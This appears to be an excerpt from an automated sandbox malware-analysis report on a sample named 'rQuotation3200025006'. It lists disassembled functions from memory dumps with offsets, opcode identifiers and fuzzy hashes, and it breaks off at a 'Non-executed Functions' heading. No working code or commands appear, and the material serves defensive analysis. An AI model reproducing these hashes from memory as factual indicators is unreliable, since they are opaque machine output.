                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d0b4f967132da4aeec416e79e8773d05bec2e7722ad40a57f09cb34932e5f83a
                                        • Instruction ID: a7cd7e972a980253d49f5bc9fd57dccdb19fb786577906c86594f8403052de28
                                        • Opcode Fuzzy Hash: d0b4f967132da4aeec416e79e8773d05bec2e7722ad40a57f09cb34932e5f83a
                                        • Instruction Fuzzy Hash: 1901DF30F001204FCB619A7E955476F63CADBCA714F24882EE40AC7740EE20DC034786
                                        Function 06933D93 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f1f7fbe3466575402aff5c1b56dafeeae5e5d6febee987c1acbec5d886da679b
                                        • Instruction ID: 1701d65d7df13d37b2f40ff773d2afd82e0f358d4c2653ade784b10ace63a3b3
                                        • Opcode Fuzzy Hash: f1f7fbe3466575402aff5c1b56dafeeae5e5d6febee987c1acbec5d886da679b
                                        • Instruction Fuzzy Hash: 2721C2B5D01259AFCB10DF9AD985ADEFFF4FB48314F10852AE518A7200C374A954CFA5
                                        Function 06933578 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc02b1a3a08a1bcc130017b57695aadebfe6e2c9ba1efb7873b33a8d8f76a417
                                        • Instruction ID: ff362be5ecad0c3a3f528954b21049e15bdb2954aad75f93baffd90fb695544a
                                        • Opcode Fuzzy Hash: fc02b1a3a08a1bcc130017b57695aadebfe6e2c9ba1efb7873b33a8d8f76a417
                                        • Instruction Fuzzy Hash: 21016D71E402689FCB68DB79C8405DEF7BAEB89310F10896AD51AE7640EA31DE41CF91
                                        Function 00E3D1F3 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4158042601.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_e3d000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                        • Instruction ID: 4dc4cfddc20cfc6e16761c032299c4560af663db92f8fec8241530696798a933
                                        • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                        • Instruction Fuzzy Hash: 8F11B275508280CFDB12CF14E9C8B16FF71FB94328F24C6AAD8495B656C33AD81ACB91
                                        Function 00E3D3A3 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4158042601.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_e3d000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                        • Instruction ID: 11724a3277f38bf66bb2282456fd7313a57d541712e3f5a468adc421c6da4171
                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                        • Instruction Fuzzy Hash: 3211D075508240CFCB01CF10D9C8B15BF72FB84318F24C6AED9494B256C33AE84ACB52
                                        Function 069340C9 Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 869b278f8471284a143bceb5ec974d5447742171a96424ae6f797904131a29a4
                                        • Instruction ID: f97a01a1bdc227e10a4a3de6619e0af052d411261ed3462c3bab6828e74f2b84
                                        • Opcode Fuzzy Hash: 869b278f8471284a143bceb5ec974d5447742171a96424ae6f797904131a29a4
                                        • Instruction Fuzzy Hash: 1A018436F105245BEBA49569DC107AB72EEEBD8714F11403AD50AD3744DE659C0247D2
                                        Function 06933D98 Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4c607f70ce73a457c2efe26e8603cc6e018f3cff42f7d616d7a42a2e90b2d48e
                                        • Instruction ID: a541e2e18fb79b22900457bbc933e92d7d5b7e7457727c43696c82402000fa7e
                                        • Opcode Fuzzy Hash: 4c607f70ce73a457c2efe26e8603cc6e018f3cff42f7d616d7a42a2e90b2d48e
                                        • Instruction Fuzzy Hash: 0E11D3B5D01259AFCB10DF9AD984ADEFFF4FB48310F10852AE518A7200C374A954CFA5
                                        Function 00E3D113 Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4158042601.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_e3d000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
                                        • Instruction ID: 44862ef66564707d6c2d92b0f7b010c31e72e6d6bc14db61bbbc103a1c747442
                                        • Opcode Fuzzy Hash: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
                                        • Instruction Fuzzy Hash: 37119D75508284CFDB15CF14D9C8B15BFB2FB94318F24C6ADD8494B656C33AD84ACB91
                                        Function 06934320 Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bd06e9884e7c8850b3d7e4354aab759bfe411e01f8b312f47e3d62ab2061cca3
                                        • Instruction ID: 3588c5864895379cafd448e6d87b833f9ae895b7189f90de4031802ace0fee39
                                        • Opcode Fuzzy Hash: bd06e9884e7c8850b3d7e4354aab759bfe411e01f8b312f47e3d62ab2061cca3
                                        • Instruction Fuzzy Hash: 91016D31B101201BDB64956DE55076FA7DEDBCAB10F248839E10EC7754EE66DC024395
                                        Function 0693F2C0 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33a4fb766f333e15d1e2d7cb20d22de9f95777c6478c69215dab68a0ad71a4fb
                                        • Instruction ID: 0dd33b42ed4e74bed22c05cc26df45e678af26e856e7bf52e6a08bdd6d98ef25
                                        • Opcode Fuzzy Hash: 33a4fb766f333e15d1e2d7cb20d22de9f95777c6478c69215dab68a0ad71a4fb
                                        • Instruction Fuzzy Hash: 4D018C35F001215FCB64A67EA450B2E63DEDBCA724F24883AE50AC7740EE25DC034786
                                        Function 060B3EC8 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0549f9c87db528d16a05ee3bddd228383a32c2d8e085b2652a1d8fe5f4fb654a
                                        • Instruction ID: bcbd106a820f3fc10623d7b88f64b43033c0ddd4a8c638fc51c58ee548804984
                                        • Opcode Fuzzy Hash: 0549f9c87db528d16a05ee3bddd228383a32c2d8e085b2652a1d8fe5f4fb654a
                                        • Instruction Fuzzy Hash: A0110036A04288AFCB068F64DC149DABFB1EF06200B0984AAF554DB262C735D819CB61
                                        Function 0693FCC1 Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8f69223c213297b3ab670ac7b4085fac96a296b7b931da076d764bc748e11911
                                        • Instruction ID: d96e5eb7a5fc0f1bf6c012304cc12c0f3ca364983fb0150f4a449599d501400a
                                        • Opcode Fuzzy Hash: 8f69223c213297b3ab670ac7b4085fac96a296b7b931da076d764bc748e11911
                                        • Instruction Fuzzy Hash: CF019234A00225AFDB64DF65E94C76E7BB6EF89310F204929E516E77A0DB309C45CBC0
                                        Function 060B3104 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 37a070a5a958e304ff2f36ba4806b91010b715054961367ede5a81a108ef3623
                                        • Instruction ID: 5aa95519ef2009206620e42df4edc6db0baec7503fce0df6fb771b0999205c1b
                                        • Opcode Fuzzy Hash: 37a070a5a958e304ff2f36ba4806b91010b715054961367ede5a81a108ef3623
                                        • Instruction Fuzzy Hash: 76019E70680720DFD3AC8B6AD4845A7BFE6BB84700B24DD19E447C6615C771E845CB94
                                        Function 0693A428 Relevance: .0, Instructions: 46COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bcf30555f91a51c0b43e58fae8c6f3b101f4a8a17fff23196ce71955a144ba37
                                        • Instruction ID: a01880b7fb44a09e88b19755d0fad75815f316e67bc5376e5ecd950de6a8e9b6
                                        • Opcode Fuzzy Hash: bcf30555f91a51c0b43e58fae8c6f3b101f4a8a17fff23196ce71955a144ba37
                                        • Instruction Fuzzy Hash: 4301A430B101244FCB50EA7EE858B2AB7DADB89714F608838E14EC7754EE22DC428785
                                        Function 0693C900 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 34a06ff78725869e631d0c09c9140486ddee6837e842b4a7e54e48aafaa3ca6a
                                        • Instruction ID: 4638df860a6f45356b05f07cf47885e0716edcbe068a4a620a8d3f58def709a1
                                        • Opcode Fuzzy Hash: 34a06ff78725869e631d0c09c9140486ddee6837e842b4a7e54e48aafaa3ca6a
                                        • Instruction Fuzzy Hash: C401A431B112349BCF54AA6AE940A9EB77AF785354F104539E905EB344DB31AC05CB90
                                        Function 060B1041 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c65833606375a7e86f7b1563795f2d0cd47047773501ba1d7d8f9da43bd405b0
                                        • Instruction ID: 476c1eeb72564b7f5518fba068ce3d211a1fc45b0c857eff5227dc00f8e32232
                                        • Opcode Fuzzy Hash: c65833606375a7e86f7b1563795f2d0cd47047773501ba1d7d8f9da43bd405b0
                                        • Instruction Fuzzy Hash: 24F06272A401086FDB85EB6ADC01E9BBBEAEBC4354B04C165E919DB214D631D9018B90
                                        Function 060B1A88 Relevance: .0, Instructions: 38COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e06820bc7ef92629d55a9c1971131a1159d8fa71df973fc1e586d901c88c70e7
                                        • Instruction ID: 5a2c7cda71953ddb683751e625b022173856aa14283815f8cdf10559c8fc46aa
                                        • Opcode Fuzzy Hash: e06820bc7ef92629d55a9c1971131a1159d8fa71df973fc1e586d901c88c70e7
                                        • Instruction Fuzzy Hash: 76F09072D511085FCFA0DE99D9C4ADEFFF5EB45210F549876E505D2200D220E9488B50
                                        Function 060B1BB8 Relevance: .0, Instructions: 38COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f0296f1dd454b1b518e1d78037bd382127dede7496d6bdb77ad49d89d12d9a5
                                        • Instruction ID: 842894b2192ad7de5666639324cfc4155c657a0568937845c8ed6b0e82f90152
                                        • Opcode Fuzzy Hash: 5f0296f1dd454b1b518e1d78037bd382127dede7496d6bdb77ad49d89d12d9a5
                                        • Instruction Fuzzy Hash: B901A775D4020A8BDF40DBA0CC506EEBBB5AF88214F149975C412B7391EB745D06CBA5
                                        Function 060B3E79 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f0337d3ba7190686cc9b2144957c14215291d4ed40bb6222bfece7afe2ad1740
                                        • Instruction ID: 87f68ca7acc05439f3e2b6365486cf3569c189a2ab6f41fd604c2d0ebe7fe250
                                        • Opcode Fuzzy Hash: f0337d3ba7190686cc9b2144957c14215291d4ed40bb6222bfece7afe2ad1740
                                        • Instruction Fuzzy Hash: 6BF03A72E10714ABCB24CEA9D80169BBBF9EF48610F04896AE455D2240E731E904CB90
                                        Function 060B2D79 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 05caf0e78bbaabcc04e3eeb8a1542c8424d6a86f6797568655be95633d843d6a
                                        • Instruction ID: 1796a51c1e3604080e92b54ac7382ca0c46d4e4a38e6a9dec5add0d93c866d96
                                        • Opcode Fuzzy Hash: 05caf0e78bbaabcc04e3eeb8a1542c8424d6a86f6797568655be95633d843d6a
                                        • Instruction Fuzzy Hash: 82E02B367401409FC744CA6AE844A6BBFDAFFC922176A41B8E10ED3351DE21DC028790
                                        Function 060B3E88 Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a60431d95c15f243d59937b57c5aa27e103f73c024816a4c4f200cbe58aae03e
                                        • Instruction ID: 1af97d901a2ee9f13ae9858e4610f05a6e3da11304b5acc4b11ef5493bbecd73
                                        • Opcode Fuzzy Hash: a60431d95c15f243d59937b57c5aa27e103f73c024816a4c4f200cbe58aae03e
                                        • Instruction Fuzzy Hash: B1F03075E00714EF8B34CFA9D80449EBBF9FF48710B40896AE55593640D731E918CB90
                                        Function 06936580 Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 32a0146844c2aa680dcc4e3f4bad2d1c9881c29b616614178d8a77e70fb6a393
                                        • Instruction ID: f7450177ce13eb27256cc5a60a5e7cc30f289dd8df8c8f33e30ba36e5608a3a6
                                        • Opcode Fuzzy Hash: 32a0146844c2aa680dcc4e3f4bad2d1c9881c29b616614178d8a77e70fb6a393
                                        • Instruction Fuzzy Hash: 69E0D872D151186FDF90CF74CA1535B77A99B42204F3048F6C804CB546E136CE058741
                                        Function 06936590 Relevance: .0, Instructions: 22COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bbdc51fb53645a6523892bb5479baa6c78d81e1bc7dcc723c2926803fef69f91
                                        • Instruction ID: 02e3b46cd4b8214d48e15d09af5e3c7e3fddbaa9ae6189481ca21d43a85ed0a5
                                        • Opcode Fuzzy Hash: bbdc51fb53645a6523892bb5479baa6c78d81e1bc7dcc723c2926803fef69f91
                                        • Instruction Fuzzy Hash: 2DE01271E10118BBDF50DEB4C94575B77EDD746214F3088B5D409C7606E576DE018781
                                        Function 060B11C0 Relevance: .0, Instructions: 22COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 44b15060630e1abf1eb1d74424574b0a929cd1e1d8fb0c76c46e81eb1be9db5f
                                        • Instruction ID: 478c35f60f5bc5402efcf417aaddebb147bcb62e55ce2dbc655be1f0502b355e
                                        • Opcode Fuzzy Hash: 44b15060630e1abf1eb1d74424574b0a929cd1e1d8fb0c76c46e81eb1be9db5f
                                        • Instruction Fuzzy Hash: 5EE06578A40205DFC700EBB4EA427AD7BF6EB44304B1446A4E806E7306DA362E02AB50
                                        Function 060B11D0 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8b028a04d9691c95691915e648c24515933e83bd3fb209227ca46e4500827491
                                        • Instruction ID: 74430263e9fefb5df9d6c6509d25051e8a3bda13ae8a3a92fdb9f6222b353b08
                                        • Opcode Fuzzy Hash: 8b028a04d9691c95691915e648c24515933e83bd3fb209227ca46e4500827491
                                        • Instruction Fuzzy Hash: 26E0E674950209EFC700EFB5E94295D7BF6FB44304B104654E906D7715DB326F04DB55
                                        Function 060B3C00 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 073162327c85b688aed3e9875724d0d0dfba223a88623b5cd0303d06d076bb23
                                        • Instruction ID: 31327b0dd145daa9a4e52f4c621d538a62ee590aec2ef14279b2381668ee88e6
                                        • Opcode Fuzzy Hash: 073162327c85b688aed3e9875724d0d0dfba223a88623b5cd0303d06d076bb23
                                        • Instruction Fuzzy Hash: 9BC0122335016103DB5952A87D217EE5A494786216F1C6167911D96781CC49895246D5
                                        Function 060B2540 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 389e6a432a9304965d7c23b982a61661f80998afe0e72d737ee99781993eb251
                                        • Instruction ID: 3834150799df4563ee4240c057e1eab9f2db6ff23228f51cec659b86c1aaba12
                                        • Opcode Fuzzy Hash: 389e6a432a9304965d7c23b982a61661f80998afe0e72d737ee99781993eb251
                                        • Instruction Fuzzy Hash: D5D06C3214021DBB8F41AE85EC01DDB3B2AEB896A0B148115FA2416221C272AD61ABE0
                                        Function 060B3C10 Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b4609514201780ea1b218cf72e5a0d778c33918a7f8720b1b0c63680d7ff6fcf
                                        • Instruction ID: f3f80309c1cad1fd452840815295ae23b4616dff2e263aeeaf25f1f76fa61b55
                                        • Opcode Fuzzy Hash: b4609514201780ea1b218cf72e5a0d778c33918a7f8720b1b0c63680d7ff6fcf
                                        • Instruction Fuzzy Hash: 61B09B2135413513DA4C719D68105FD768D87C5565F144067D51D977418CC59C4106DE
                                        Function 060B2E57 Relevance: .0, Instructions: 11COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 34b1e4ae6d81222d30cd9e12049a5758e10f083b3332b81ae6838c427f33d712
                                        • Instruction ID: d422a14a16b9eb01fce2ff471f546ee405181fa1af914474cddd657808fa2d26
                                        • Opcode Fuzzy Hash: 34b1e4ae6d81222d30cd9e12049a5758e10f083b3332b81ae6838c427f33d712
                                        • Instruction Fuzzy Hash: 55C08C34750A608B8AE1AF35A0100ECBBF0AB49720300491AE12A83740CB36DA164784
                                        Function 060B278B Relevance: .0, Instructions: 11COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c6b1e2e5f09b3fc899e45a1f256986a2105fdf96516d21e88a0ad2dd41bbcce
                                        • Instruction ID: 6526bf6bbcf493ae12185c6ad30da762a1744a22e07b363dd55399f1323edbd3
                                        • Opcode Fuzzy Hash: 0c6b1e2e5f09b3fc899e45a1f256986a2105fdf96516d21e88a0ad2dd41bbcce
                                        • Instruction Fuzzy Hash: EBD092748C421ACFEBA08F91C828BFEBBB0FB04315F009419C101A6290CBBD064ACF95
                                        Function 060B287F Relevance: .0, Instructions: 10COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3abf639147ee1380ab42802d44bf2ce9283182802654dd9d45c74e3b1f78490e
                                        • Instruction ID: ca96121cd3e75309595867edb36e061710e3ba0f9d6085813e69d40af49c6bca
                                        • Opcode Fuzzy Hash: 3abf639147ee1380ab42802d44bf2ce9283182802654dd9d45c74e3b1f78490e
                                        • Instruction Fuzzy Hash: 9BD0C9B18816408ADF488F14DC082453F61AB65328B35029994598A2D3E37AC543CB91
                                        Function 060B2E20 Relevance: .0, Instructions: 9COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 92b1609c532dce4a49370e5aa8cb4e9fb50891f6e50ab94a7e830a65e7076c33
                                        • Instruction ID: ed55bb05f4ca65b802c41cf3a628eece015961e276f3c5d0245ffc6212f072f3
                                        • Opcode Fuzzy Hash: 92b1609c532dce4a49370e5aa8cb4e9fb50891f6e50ab94a7e830a65e7076c33
                                        • Instruction Fuzzy Hash: 6DA0124B98104081D5E110A0DC813CB94019780021F089110000D91509CC1C93000232
                                        Function 060B0F20 Relevance: .0, Instructions: 9COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 121e28461cae01551a22b1110b623628a864458228952941fa0fc3263c59bdf8
                                        • Instruction ID: 895ddfbe81fbccf0a072f1efbafa5bf27298b6fcd7fcfdc3bb45849ba4555a9a
                                        • Opcode Fuzzy Hash: 121e28461cae01551a22b1110b623628a864458228952941fa0fc3263c59bdf8
                                        • Instruction Fuzzy Hash: 05C012704C12008ACF189F1899481267F51EB90324B3056489419491D1C371C583C7C1

                                        Non-executed Functions

                                        Function 069377B0 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
